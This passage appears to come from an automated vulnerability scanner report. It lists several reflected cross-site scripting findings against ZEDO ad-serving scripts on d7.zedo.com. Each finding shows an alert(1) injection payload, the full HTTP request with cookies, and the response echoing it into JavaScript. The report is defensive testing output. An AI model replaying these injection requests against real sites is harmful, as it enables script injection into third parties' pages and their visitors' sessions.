Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=414
Expires: Sat, 29 Jan 2011 23:29:14 GMT
Date: Sat, 29 Jan 2011 23:22:20 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d2/jsc/fm.js;qs=c=e50f4'-alert(1)-'430b04548c0;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(zz
...[SNIP]...

5.179. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9ab'-alert(1)-'bacc7d9a398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?fb9ab'-alert(1)-'bacc7d9a398=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Expires: Sat, 29 Jan 2011 23:29:14 GMT
Date: Sat, 29 Jan 2011 23:22:18 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d2/jsc/fm.js;qs=fb9ab'-alert(1)-'bacc7d9a398=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

5.180. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//7005141fb0c was submitted in the q parameter. This input was echoed as 1b9af';alert(1)//7005141fb0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=1b9af'%3balert(1)//7005141fb0c&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2389

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='1b9af';alert(1)//7005141fb0c';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=1b9af';alert(1)//7005141fb0c;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

5.181. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3767"%3balert(1)//62e257b111a was submitted in the q parameter. This input was echoed as a3767";alert(1)//62e257b111a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=a3767"%3balert(1)//62e257b111a&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2375

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='a3767";alert(1)//62e257b111a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=a3767";alert(1)//62e257b111a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + M
...[SNIP]...

5.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b448'%3balert(1)//a06e2db3d7d was submitted in the $ parameter. This input was echoed as 7b448';alert(1)//a06e2db3d7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=7b448'%3balert(1)//a06e2db3d7d&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:7b448';alert(1)//a06e2db3d7d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3404

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',7b448';alert(1)//a06e2db3d7d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7b448';alert(1)//a06e2db3d7d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

5.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a54da"%3balert(1)//9ae9a9f14f3 was submitted in the $ parameter. This input was echoed as a54da";alert(1)//9ae9a9f14f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=a54da"%3balert(1)//9ae9a9f14f3&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:a54da";alert(1)//9ae9a9f14f3;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3404

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',a54da";alert(1)//9ae9a9f14f3';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a54da";alert(1)//9ae9a9f14f3;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

5.184. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b4e'%3balert(1)//c10e308a487 was submitted in the l parameter. This input was echoed as 44b4e';alert(1)//c10e308a487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D44b4e'%3balert(1)//c10e308a487&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:44 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D6%3Bf%3D1067550%3Bh%3D1067546%3Bk=http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=44b4e';alert(1)//c10e308a487http://svtrk.com/vtrk/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=ROS" TARGET="_blank" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage(\'Image1\',\'
...[SNIP]...

5.185. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec49'-alert(1)-'d75dcf13764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?8ec49'-alert(1)-'d75dcf13764=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:3:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 